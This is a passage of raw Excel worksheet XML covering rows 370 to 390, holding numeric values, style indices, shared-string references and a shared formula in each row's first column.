      <c r="Y370" s="45"/>
      <c r="Z370" s="38" t="s">
        <v>2183</v>
      </c>
      <c r="AA370" s="39" t="s">
        <v>2184</v>
      </c>
      <c r="AB370" s="38" t="s">
        <v>2185</v>
      </c>
      <c r="AC370" s="40">
        <v>30246.0</v>
      </c>
      <c r="AD370" s="5"/>
      <c r="AE370" s="14"/>
      <c r="AF370" s="14"/>
    </row>
    <row r="371">
      <c r="A371" s="6">
        <f t="shared" si="1"/>
        <v>0.4731436526</v>
      </c>
      <c r="B371" s="29">
        <v>1.0</v>
      </c>
      <c r="C371" s="15"/>
      <c r="D371" s="14"/>
      <c r="E371" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F371" s="14"/>
      <c r="G371" s="29">
        <v>1.0</v>
      </c>
      <c r="H371" s="29">
        <v>133.0</v>
      </c>
      <c r="I371" s="29">
        <v>206331.0</v>
      </c>
      <c r="J371" s="15"/>
      <c r="K371" s="29">
        <v>98538.0</v>
      </c>
      <c r="L371" s="15"/>
      <c r="M371" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N371" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O371" s="29">
        <v>0.0</v>
      </c>
      <c r="P371" s="29">
        <v>1.0</v>
      </c>
      <c r="Q371" s="15"/>
      <c r="R371" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S371" s="15"/>
      <c r="T371" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U371" s="5"/>
      <c r="V371" s="5"/>
      <c r="W371" s="47"/>
      <c r="X371" s="45"/>
      <c r="Y371" s="45"/>
      <c r="Z371" s="38" t="s">
        <v>2186</v>
      </c>
      <c r="AA371" s="39" t="s">
        <v>2187</v>
      </c>
      <c r="AB371" s="38" t="s">
        <v>2188</v>
      </c>
      <c r="AC371" s="40">
        <v>223200.0</v>
      </c>
      <c r="AD371" s="5"/>
      <c r="AE371" s="14"/>
      <c r="AF371" s="14"/>
    </row>
    <row r="372">
      <c r="A372" s="6">
        <f t="shared" si="1"/>
        <v>0.165151228</v>
      </c>
      <c r="B372" s="29">
        <v>1.0</v>
      </c>
      <c r="C372" s="29">
        <v>126968.0</v>
      </c>
      <c r="D372" s="14"/>
      <c r="E372" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F372" s="14"/>
      <c r="G372" s="29">
        <v>4.0</v>
      </c>
      <c r="H372" s="29">
        <v>1013.0</v>
      </c>
      <c r="I372" s="29">
        <v>70714.0</v>
      </c>
      <c r="J372" s="15"/>
      <c r="K372" s="15"/>
      <c r="L372" s="15"/>
      <c r="M372" s="15"/>
      <c r="N372" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O372" s="29">
        <v>3.0</v>
      </c>
      <c r="P372" s="29">
        <v>3.0</v>
      </c>
      <c r="Q372" s="15"/>
      <c r="R372" s="15"/>
      <c r="S372" s="15"/>
      <c r="T372" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U372" s="5"/>
      <c r="V372" s="5"/>
      <c r="W372" s="47"/>
      <c r="X372" s="45"/>
      <c r="Y372" s="45"/>
      <c r="Z372" s="38" t="s">
        <v>2189</v>
      </c>
      <c r="AA372" s="39" t="s">
        <v>2190</v>
      </c>
      <c r="AB372" s="38" t="s">
        <v>2191</v>
      </c>
      <c r="AC372" s="40">
        <v>126894.0</v>
      </c>
      <c r="AD372" s="5"/>
      <c r="AE372" s="14"/>
      <c r="AF372" s="14"/>
    </row>
    <row r="373">
      <c r="A373" s="6">
        <f t="shared" si="1"/>
        <v>0.7158851042</v>
      </c>
      <c r="B373" s="29">
        <v>1.0</v>
      </c>
      <c r="C373" s="15"/>
      <c r="D373" s="14"/>
      <c r="E373" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F373" s="14"/>
      <c r="G373" s="29">
        <v>2.0</v>
      </c>
      <c r="H373" s="29">
        <v>1058.0</v>
      </c>
      <c r="I373" s="29">
        <v>177773.0</v>
      </c>
      <c r="J373" s="15"/>
      <c r="K373" s="29">
        <v>189423.0</v>
      </c>
      <c r="L373" s="15"/>
      <c r="M373" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N373" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O373" s="29">
        <v>2.0</v>
      </c>
      <c r="P373" s="29">
        <v>4.0</v>
      </c>
      <c r="Q373" s="15"/>
      <c r="R373" s="15"/>
      <c r="S373" s="15"/>
      <c r="T373" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U373" s="5"/>
      <c r="V373" s="5"/>
      <c r="W373" s="47"/>
      <c r="X373" s="45"/>
      <c r="Y373" s="45"/>
      <c r="Z373" s="38" t="s">
        <v>2192</v>
      </c>
      <c r="AA373" s="39" t="s">
        <v>2193</v>
      </c>
      <c r="AB373" s="38" t="s">
        <v>2194</v>
      </c>
      <c r="AC373" s="40">
        <v>185547.0</v>
      </c>
      <c r="AD373" s="5"/>
      <c r="AE373" s="14"/>
      <c r="AF373" s="14"/>
    </row>
    <row r="374">
      <c r="A374" s="6">
        <f t="shared" si="1"/>
        <v>0.3477915719</v>
      </c>
      <c r="B374" s="29">
        <v>1.0</v>
      </c>
      <c r="C374" s="29">
        <v>166445.0</v>
      </c>
      <c r="D374" s="14"/>
      <c r="E374" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F374" s="14"/>
      <c r="G374" s="29">
        <v>7.0</v>
      </c>
      <c r="H374" s="29">
        <v>15548.0</v>
      </c>
      <c r="I374" s="29">
        <v>155661.0</v>
      </c>
      <c r="J374" s="15"/>
      <c r="K374" s="15"/>
      <c r="L374" s="15"/>
      <c r="M374" s="14"/>
      <c r="N374" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O374" s="29">
        <v>8.0</v>
      </c>
      <c r="P374" s="29">
        <v>1.0</v>
      </c>
      <c r="Q374" s="15"/>
      <c r="R374" s="15"/>
      <c r="S374" s="15"/>
      <c r="T374" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U374" s="5"/>
      <c r="V374" s="5"/>
      <c r="W374" s="47"/>
      <c r="X374" s="45"/>
      <c r="Y374" s="45"/>
      <c r="Z374" s="38" t="s">
        <v>2195</v>
      </c>
      <c r="AA374" s="39" t="s">
        <v>2196</v>
      </c>
      <c r="AB374" s="38" t="s">
        <v>2197</v>
      </c>
      <c r="AC374" s="40">
        <v>166425.0</v>
      </c>
      <c r="AD374" s="5"/>
      <c r="AE374" s="14"/>
      <c r="AF374" s="14"/>
    </row>
    <row r="375">
      <c r="A375" s="6">
        <f t="shared" si="1"/>
        <v>0.3838467437</v>
      </c>
      <c r="B375" s="29">
        <v>1.0</v>
      </c>
      <c r="C375" s="15"/>
      <c r="D375" s="14"/>
      <c r="E375" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F375" s="14"/>
      <c r="G375" s="29">
        <v>5.0</v>
      </c>
      <c r="H375" s="29">
        <v>292.0</v>
      </c>
      <c r="I375" s="29">
        <v>68278.0</v>
      </c>
      <c r="J375" s="15"/>
      <c r="K375" s="29">
        <v>31854.0</v>
      </c>
      <c r="L375" s="14"/>
      <c r="M375" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N375" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O375" s="29">
        <v>3.0</v>
      </c>
      <c r="P375" s="29">
        <v>0.0</v>
      </c>
      <c r="Q375" s="15"/>
      <c r="R375" s="15"/>
      <c r="S375" s="15"/>
      <c r="T375" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U375" s="5"/>
      <c r="V375" s="5"/>
      <c r="W375" s="47"/>
      <c r="X375" s="45"/>
      <c r="Y375" s="45"/>
      <c r="Z375" s="38" t="s">
        <v>2198</v>
      </c>
      <c r="AA375" s="39" t="s">
        <v>2199</v>
      </c>
      <c r="AB375" s="38" t="s">
        <v>2200</v>
      </c>
      <c r="AC375" s="40">
        <v>81577.0</v>
      </c>
      <c r="AD375" s="5"/>
      <c r="AE375" s="14"/>
      <c r="AF375" s="14"/>
    </row>
    <row r="376">
      <c r="A376" s="6">
        <f t="shared" si="1"/>
        <v>0.812366434</v>
      </c>
      <c r="B376" s="29">
        <v>1.0</v>
      </c>
      <c r="C376" s="15"/>
      <c r="D376" s="14"/>
      <c r="E376" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F376" s="14"/>
      <c r="G376" s="29">
        <v>0.0</v>
      </c>
      <c r="H376" s="29">
        <v>106.0</v>
      </c>
      <c r="I376" s="29">
        <v>122449.0</v>
      </c>
      <c r="J376" s="15"/>
      <c r="K376" s="29">
        <v>122449.0</v>
      </c>
      <c r="L376" s="15"/>
      <c r="M376" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N376" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O376" s="29">
        <v>1.0</v>
      </c>
      <c r="P376" s="29">
        <v>7.0</v>
      </c>
      <c r="Q376" s="15"/>
      <c r="R376" s="15"/>
      <c r="S376" s="15"/>
      <c r="T376" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U376" s="5"/>
      <c r="V376" s="5"/>
      <c r="W376" s="47"/>
      <c r="X376" s="45"/>
      <c r="Y376" s="45"/>
      <c r="Z376" s="38" t="s">
        <v>2201</v>
      </c>
      <c r="AA376" s="39" t="s">
        <v>2202</v>
      </c>
      <c r="AB376" s="38" t="s">
        <v>2203</v>
      </c>
      <c r="AC376" s="40">
        <v>166120.0</v>
      </c>
      <c r="AD376" s="5"/>
      <c r="AE376" s="14"/>
      <c r="AF376" s="14"/>
    </row>
    <row r="377">
      <c r="A377" s="6">
        <f t="shared" si="1"/>
        <v>0.3465718651</v>
      </c>
      <c r="B377" s="29">
        <v>1.0</v>
      </c>
      <c r="C377" s="29">
        <v>205910.0</v>
      </c>
      <c r="D377" s="14"/>
      <c r="E377" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F377" s="14"/>
      <c r="G377" s="29">
        <v>2.0</v>
      </c>
      <c r="H377" s="29">
        <v>116.0</v>
      </c>
      <c r="I377" s="29">
        <v>99312.0</v>
      </c>
      <c r="J377" s="15"/>
      <c r="K377" s="15"/>
      <c r="L377" s="15"/>
      <c r="M377" s="15"/>
      <c r="N377" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O377" s="29">
        <v>1.0</v>
      </c>
      <c r="P377" s="29">
        <v>0.0</v>
      </c>
      <c r="Q377" s="15"/>
      <c r="R377" s="15"/>
      <c r="S377" s="15"/>
      <c r="T377" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U377" s="5"/>
      <c r="V377" s="5"/>
      <c r="W377" s="47"/>
      <c r="X377" s="45"/>
      <c r="Y377" s="45"/>
      <c r="Z377" s="38" t="s">
        <v>2204</v>
      </c>
      <c r="AA377" s="39" t="s">
        <v>2205</v>
      </c>
      <c r="AB377" s="38" t="s">
        <v>2206</v>
      </c>
      <c r="AC377" s="40">
        <v>205909.0</v>
      </c>
      <c r="AD377" s="5"/>
      <c r="AE377" s="14"/>
      <c r="AF377" s="14"/>
    </row>
    <row r="378">
      <c r="A378" s="6">
        <f t="shared" si="1"/>
        <v>0.09192586391</v>
      </c>
      <c r="B378" s="29">
        <v>1.0</v>
      </c>
      <c r="C378" s="29">
        <v>19034.0</v>
      </c>
      <c r="D378" s="14"/>
      <c r="E378" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F378" s="14"/>
      <c r="G378" s="29">
        <v>7.0</v>
      </c>
      <c r="H378" s="29">
        <v>15255.0</v>
      </c>
      <c r="I378" s="29">
        <v>12379.0</v>
      </c>
      <c r="J378" s="15"/>
      <c r="K378" s="29">
        <v>396.0</v>
      </c>
      <c r="L378" s="15"/>
      <c r="M378" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N378" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O378" s="29">
        <v>3.0</v>
      </c>
      <c r="P378" s="29">
        <v>5.0</v>
      </c>
      <c r="Q378" s="15"/>
      <c r="R378" s="15"/>
      <c r="S378" s="15"/>
      <c r="T378" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U378" s="5"/>
      <c r="V378" s="5"/>
      <c r="W378" s="47"/>
      <c r="X378" s="45"/>
      <c r="Y378" s="45"/>
      <c r="Z378" s="38" t="s">
        <v>2207</v>
      </c>
      <c r="AA378" s="39" t="s">
        <v>2208</v>
      </c>
      <c r="AB378" s="38" t="s">
        <v>2209</v>
      </c>
      <c r="AC378" s="40">
        <v>19033.0</v>
      </c>
      <c r="AD378" s="5"/>
      <c r="AE378" s="14"/>
      <c r="AF378" s="14"/>
    </row>
    <row r="379">
      <c r="A379" s="6">
        <f t="shared" si="1"/>
        <v>0.4387103209</v>
      </c>
      <c r="B379" s="29">
        <v>1.0</v>
      </c>
      <c r="C379" s="29">
        <v>124367.0</v>
      </c>
      <c r="D379" s="14"/>
      <c r="E379" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F379" s="14"/>
      <c r="G379" s="29">
        <v>0.0</v>
      </c>
      <c r="H379" s="29">
        <v>1546.0</v>
      </c>
      <c r="I379" s="29">
        <v>79562.0</v>
      </c>
      <c r="J379" s="15"/>
      <c r="K379" s="15"/>
      <c r="L379" s="15"/>
      <c r="M379" s="14"/>
      <c r="N379" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O379" s="29">
        <v>3.0</v>
      </c>
      <c r="P379" s="29">
        <v>6.0</v>
      </c>
      <c r="Q379" s="15"/>
      <c r="R379" s="15"/>
      <c r="S379" s="15"/>
      <c r="T379" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U379" s="5"/>
      <c r="V379" s="5"/>
      <c r="W379" s="47"/>
      <c r="X379" s="45"/>
      <c r="Y379" s="45"/>
      <c r="Z379" s="38" t="s">
        <v>2210</v>
      </c>
      <c r="AA379" s="39" t="s">
        <v>2211</v>
      </c>
      <c r="AB379" s="38" t="s">
        <v>1584</v>
      </c>
      <c r="AC379" s="40">
        <v>124364.0</v>
      </c>
      <c r="AD379" s="5"/>
      <c r="AE379" s="14"/>
      <c r="AF379" s="14"/>
    </row>
    <row r="380">
      <c r="A380" s="6">
        <f t="shared" si="1"/>
        <v>0.2677324295</v>
      </c>
      <c r="B380" s="29">
        <v>1.0</v>
      </c>
      <c r="C380" s="29">
        <v>57298.0</v>
      </c>
      <c r="D380" s="14"/>
      <c r="E380" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F380" s="14"/>
      <c r="G380" s="29">
        <v>45.0</v>
      </c>
      <c r="H380" s="29">
        <v>9533.0</v>
      </c>
      <c r="I380" s="29">
        <v>43949.0</v>
      </c>
      <c r="J380" s="15"/>
      <c r="K380" s="15"/>
      <c r="L380" s="15"/>
      <c r="M380" s="14"/>
      <c r="N380" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O380" s="29">
        <v>4.0</v>
      </c>
      <c r="P380" s="29">
        <v>14.0</v>
      </c>
      <c r="Q380" s="15"/>
      <c r="R380" s="15"/>
      <c r="S380" s="15"/>
      <c r="T380" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U380" s="5"/>
      <c r="V380" s="5"/>
      <c r="W380" s="47"/>
      <c r="X380" s="45"/>
      <c r="Y380" s="45"/>
      <c r="Z380" s="38" t="s">
        <v>2212</v>
      </c>
      <c r="AA380" s="39" t="s">
        <v>2213</v>
      </c>
      <c r="AB380" s="38" t="s">
        <v>2214</v>
      </c>
      <c r="AC380" s="40">
        <v>57295.0</v>
      </c>
      <c r="AD380" s="5"/>
      <c r="AE380" s="14"/>
      <c r="AF380" s="14"/>
    </row>
    <row r="381">
      <c r="A381" s="6">
        <f t="shared" si="1"/>
        <v>0.05870646625</v>
      </c>
      <c r="B381" s="29">
        <v>1.0</v>
      </c>
      <c r="C381" s="15"/>
      <c r="D381" s="14"/>
      <c r="E381" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F381" s="14"/>
      <c r="G381" s="29">
        <v>0.0</v>
      </c>
      <c r="H381" s="29">
        <v>716.0</v>
      </c>
      <c r="I381" s="29">
        <v>9156.0</v>
      </c>
      <c r="J381" s="15"/>
      <c r="K381" s="15"/>
      <c r="L381" s="15"/>
      <c r="M381" s="15"/>
      <c r="N381" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O381" s="29">
        <v>1.0</v>
      </c>
      <c r="P381" s="29">
        <v>0.0</v>
      </c>
      <c r="Q381" s="15"/>
      <c r="R381" s="15"/>
      <c r="S381" s="15"/>
      <c r="T381" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U381" s="5"/>
      <c r="V381" s="5"/>
      <c r="W381" s="47"/>
      <c r="X381" s="45"/>
      <c r="Y381" s="45"/>
      <c r="Z381" s="38" t="s">
        <v>2215</v>
      </c>
      <c r="AA381" s="39" t="s">
        <v>2216</v>
      </c>
      <c r="AB381" s="38" t="s">
        <v>2217</v>
      </c>
      <c r="AC381" s="40">
        <v>237079.0</v>
      </c>
      <c r="AD381" s="5"/>
      <c r="AE381" s="14"/>
      <c r="AF381" s="14"/>
    </row>
    <row r="382">
      <c r="A382" s="6">
        <f t="shared" si="1"/>
        <v>0.01010870551</v>
      </c>
      <c r="B382" s="29">
        <v>1.0</v>
      </c>
      <c r="C382" s="29">
        <v>5336.0</v>
      </c>
      <c r="D382" s="14"/>
      <c r="E382" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F382" s="14"/>
      <c r="G382" s="29">
        <v>45.0</v>
      </c>
      <c r="H382" s="29">
        <v>8491.0</v>
      </c>
      <c r="I382" s="29">
        <v>665.0</v>
      </c>
      <c r="J382" s="15"/>
      <c r="K382" s="29">
        <v>396.0</v>
      </c>
      <c r="L382" s="15"/>
      <c r="M382" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N382" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O382" s="29">
        <v>5.0</v>
      </c>
      <c r="P382" s="29">
        <v>3.0</v>
      </c>
      <c r="Q382" s="15"/>
      <c r="R382" s="15"/>
      <c r="S382" s="15"/>
      <c r="T382" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U382" s="5"/>
      <c r="V382" s="5"/>
      <c r="W382" s="47"/>
      <c r="X382" s="45"/>
      <c r="Y382" s="45"/>
      <c r="Z382" s="38" t="s">
        <v>2218</v>
      </c>
      <c r="AA382" s="39" t="s">
        <v>2219</v>
      </c>
      <c r="AB382" s="38" t="s">
        <v>2220</v>
      </c>
      <c r="AC382" s="40">
        <v>5323.0</v>
      </c>
      <c r="AD382" s="5"/>
      <c r="AE382" s="14"/>
      <c r="AF382" s="14"/>
    </row>
    <row r="383">
      <c r="A383" s="6">
        <f t="shared" si="1"/>
        <v>0.4238012266</v>
      </c>
      <c r="B383" s="29">
        <v>1.0</v>
      </c>
      <c r="C383" s="15"/>
      <c r="D383" s="14"/>
      <c r="E383" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F383" s="14"/>
      <c r="G383" s="29">
        <v>13.0</v>
      </c>
      <c r="H383" s="29">
        <v>24501.0</v>
      </c>
      <c r="I383" s="29">
        <v>21556.0</v>
      </c>
      <c r="J383" s="15"/>
      <c r="K383" s="29">
        <v>19699.0</v>
      </c>
      <c r="L383" s="15"/>
      <c r="M383" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N383" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O383" s="29">
        <v>1.0</v>
      </c>
      <c r="P383" s="29">
        <v>5.0</v>
      </c>
      <c r="Q383" s="15"/>
      <c r="R383" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S383" s="15"/>
      <c r="T383" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U383" s="5"/>
      <c r="V383" s="5"/>
      <c r="W383" s="47"/>
      <c r="X383" s="45"/>
      <c r="Y383" s="45"/>
      <c r="Z383" s="38" t="s">
        <v>2221</v>
      </c>
      <c r="AA383" s="39" t="s">
        <v>2222</v>
      </c>
      <c r="AB383" s="38" t="s">
        <v>2223</v>
      </c>
      <c r="AC383" s="40">
        <v>32058.0</v>
      </c>
      <c r="AD383" s="5"/>
      <c r="AE383" s="14"/>
      <c r="AF383" s="14"/>
    </row>
    <row r="384">
      <c r="A384" s="6">
        <f t="shared" si="1"/>
        <v>0.7896076297</v>
      </c>
      <c r="B384" s="29">
        <v>1.0</v>
      </c>
      <c r="C384" s="29">
        <v>48150.0</v>
      </c>
      <c r="D384" s="14"/>
      <c r="E384" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F384" s="14"/>
      <c r="G384" s="29">
        <v>-1.0</v>
      </c>
      <c r="H384" s="29">
        <v>297.0</v>
      </c>
      <c r="I384" s="29">
        <v>36749.0</v>
      </c>
      <c r="J384" s="15"/>
      <c r="K384" s="29">
        <v>485.0</v>
      </c>
      <c r="L384" s="15"/>
      <c r="M384" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N384" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O384" s="29">
        <v>2.0</v>
      </c>
      <c r="P384" s="29">
        <v>0.0</v>
      </c>
      <c r="Q384" s="15"/>
      <c r="R384" s="15"/>
      <c r="S384" s="15"/>
      <c r="T384" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U384" s="5"/>
      <c r="V384" s="5"/>
      <c r="W384" s="47"/>
      <c r="X384" s="45"/>
      <c r="Y384" s="45"/>
      <c r="Z384" s="38" t="s">
        <v>2224</v>
      </c>
      <c r="AA384" s="39" t="s">
        <v>2225</v>
      </c>
      <c r="AB384" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC384" s="40">
        <v>48148.0</v>
      </c>
      <c r="AD384" s="5"/>
      <c r="AE384" s="14"/>
      <c r="AF384" s="14"/>
    </row>
    <row r="385">
      <c r="A385" s="6">
        <f t="shared" si="1"/>
        <v>0.5796568052</v>
      </c>
      <c r="B385" s="29">
        <v>1.0</v>
      </c>
      <c r="C385" s="29">
        <v>255186.0</v>
      </c>
      <c r="D385" s="14"/>
      <c r="E385" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F385" s="14"/>
      <c r="G385" s="29">
        <v>1.0</v>
      </c>
      <c r="H385" s="29">
        <v>139.0</v>
      </c>
      <c r="I385" s="29">
        <v>81149.0</v>
      </c>
      <c r="J385" s="15"/>
      <c r="K385" s="15"/>
      <c r="L385" s="15"/>
      <c r="M385" s="15"/>
      <c r="N385" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O385" s="29">
        <v>2.0</v>
      </c>
      <c r="P385" s="29">
        <v>1.0</v>
      </c>
      <c r="Q385" s="15"/>
      <c r="R385" s="15"/>
      <c r="S385" s="15"/>
      <c r="T385" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U385" s="5"/>
      <c r="V385" s="5"/>
      <c r="W385" s="47"/>
      <c r="X385" s="45"/>
      <c r="Y385" s="45"/>
      <c r="Z385" s="38" t="s">
        <v>2226</v>
      </c>
      <c r="AA385" s="39" t="s">
        <v>2227</v>
      </c>
      <c r="AB385" s="38" t="s">
        <v>2228</v>
      </c>
      <c r="AC385" s="40">
        <v>255180.0</v>
      </c>
      <c r="AD385" s="5"/>
      <c r="AE385" s="14"/>
      <c r="AF385" s="14"/>
    </row>
    <row r="386">
      <c r="A386" s="6">
        <f t="shared" si="1"/>
        <v>0.7514626349</v>
      </c>
      <c r="B386" s="29">
        <v>1.0</v>
      </c>
      <c r="C386" s="29">
        <v>4012.0</v>
      </c>
      <c r="D386" s="14"/>
      <c r="E386" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F386" s="14"/>
      <c r="G386" s="29">
        <v>19.0</v>
      </c>
      <c r="H386" s="29">
        <v>9664.0</v>
      </c>
      <c r="I386" s="29">
        <v>2521.0</v>
      </c>
      <c r="J386" s="15"/>
      <c r="K386" s="29">
        <v>-1.0</v>
      </c>
      <c r="L386" s="15"/>
      <c r="M386" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N386" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O386" s="29">
        <v>4.0</v>
      </c>
      <c r="P386" s="29">
        <v>1.0</v>
      </c>
      <c r="Q386" s="15"/>
      <c r="R386" s="15"/>
      <c r="S386" s="15"/>
      <c r="T386" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U386" s="5"/>
      <c r="V386" s="5"/>
      <c r="W386" s="45"/>
      <c r="X386" s="45"/>
      <c r="Y386" s="45"/>
      <c r="Z386" s="38" t="s">
        <v>2229</v>
      </c>
      <c r="AA386" s="39" t="s">
        <v>2230</v>
      </c>
      <c r="AB386" s="38" t="s">
        <v>2231</v>
      </c>
      <c r="AC386" s="40">
        <v>4009.0</v>
      </c>
      <c r="AD386" s="5"/>
      <c r="AE386" s="14"/>
      <c r="AF386" s="14"/>
    </row>
    <row r="387">
      <c r="A387" s="6">
        <f t="shared" si="1"/>
        <v>0.3934098814</v>
      </c>
      <c r="B387" s="29">
        <v>1.0</v>
      </c>
      <c r="C387" s="14"/>
      <c r="D387" s="14"/>
      <c r="E387" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F387" s="14"/>
      <c r="G387" s="29">
        <v>0.0</v>
      </c>
      <c r="H387" s="29">
        <v>16.0</v>
      </c>
      <c r="I387" s="29">
        <v>77957.0</v>
      </c>
      <c r="J387" s="15"/>
      <c r="K387" s="29">
        <v>6253.0</v>
      </c>
      <c r="L387" s="15"/>
      <c r="M387" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N387" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O387" s="29">
        <v>0.0</v>
      </c>
      <c r="P387" s="29">
        <v>2.0</v>
      </c>
      <c r="Q387" s="15"/>
      <c r="R387" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S387" s="15"/>
      <c r="T387" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U387" s="5"/>
      <c r="V387" s="5"/>
      <c r="W387" s="47"/>
      <c r="X387" s="45"/>
      <c r="Y387" s="45"/>
      <c r="Z387" s="38" t="s">
        <v>2232</v>
      </c>
      <c r="AA387" s="39" t="s">
        <v>2233</v>
      </c>
      <c r="AB387" s="38" t="s">
        <v>2234</v>
      </c>
      <c r="AC387" s="40">
        <v>265302.0</v>
      </c>
      <c r="AD387" s="5"/>
      <c r="AE387" s="14"/>
      <c r="AF387" s="14"/>
    </row>
    <row r="388">
      <c r="A388" s="6">
        <f t="shared" si="1"/>
        <v>0.5207216403</v>
      </c>
      <c r="B388" s="29">
        <v>1.0</v>
      </c>
      <c r="C388" s="15"/>
      <c r="D388" s="14"/>
      <c r="E388" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F388" s="14"/>
      <c r="G388" s="29">
        <v>1.0</v>
      </c>
      <c r="H388" s="29">
        <v>218.0</v>
      </c>
      <c r="I388" s="29">
        <v>248452.0</v>
      </c>
      <c r="J388" s="15"/>
      <c r="K388" s="29">
        <v>248452.0</v>
      </c>
      <c r="L388" s="15"/>
      <c r="M388" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N388" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O388" s="29">
        <v>0.0</v>
      </c>
      <c r="P388" s="29">
        <v>6.0</v>
      </c>
      <c r="Q388" s="15"/>
      <c r="R388" s="15"/>
      <c r="S388" s="15"/>
      <c r="T388" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U388" s="5"/>
      <c r="V388" s="5"/>
      <c r="W388" s="47"/>
      <c r="X388" s="45"/>
      <c r="Y388" s="45"/>
      <c r="Z388" s="38" t="s">
        <v>2235</v>
      </c>
      <c r="AA388" s="39" t="s">
        <v>2236</v>
      </c>
      <c r="AB388" s="38" t="s">
        <v>1147</v>
      </c>
      <c r="AC388" s="40">
        <v>242896.0</v>
      </c>
      <c r="AD388" s="5"/>
      <c r="AE388" s="14"/>
      <c r="AF388" s="14"/>
    </row>
    <row r="389">
      <c r="A389" s="6">
        <f t="shared" si="1"/>
        <v>0.6639311274</v>
      </c>
      <c r="B389" s="29">
        <v>1.0</v>
      </c>
      <c r="C389" s="29">
        <v>93375.0</v>
      </c>
      <c r="D389" s="14"/>
      <c r="E389" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F389" s="14"/>
      <c r="G389" s="29">
        <v>8.0</v>
      </c>
      <c r="H389" s="29">
        <v>1218.0</v>
      </c>
      <c r="I389" s="29">
        <v>80492.0</v>
      </c>
      <c r="J389" s="15"/>
      <c r="K389" s="29">
        <v>6253.0</v>
      </c>
      <c r="L389" s="15"/>
      <c r="M389" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N389" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O389" s="29">
        <v>1.0</v>
      </c>
      <c r="P389" s="29">
        <v>0.0</v>
      </c>
      <c r="Q389" s="15"/>
      <c r="R389" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S389" s="15"/>
      <c r="T389" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U389" s="5"/>
      <c r="V389" s="5"/>
      <c r="W389" s="47"/>
      <c r="X389" s="45"/>
      <c r="Y389" s="45"/>
      <c r="Z389" s="38" t="s">
        <v>2237</v>
      </c>
      <c r="AA389" s="39" t="s">
        <v>2238</v>
      </c>
      <c r="AB389" s="38" t="s">
        <v>2239</v>
      </c>
      <c r="AC389" s="40">
        <v>93370.0</v>
      </c>
      <c r="AD389" s="5"/>
      <c r="AE389" s="14"/>
      <c r="AF389" s="14"/>
    </row>
    <row r="390">
      <c r="A390" s="6">
        <f t="shared" si="1"/>
        <v>0.9560539434</v>
      </c>
      <c r="B390" s="29">
        <v>1.0</v>
      </c>
      <c r="C390" s="15"/>
      <c r="D390" s="14"/>
      <c r="E390" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F390" s="14"/>
      <c r="G390" s="29">
        <v>0.0</v>
      </c>
      <c r="H390" s="29">
        <v>328.0</v>
      </c>
      <c r="I390" s="29">
        <v>222053.0</v>
      </c>
      <c r="J390" s="15"/>
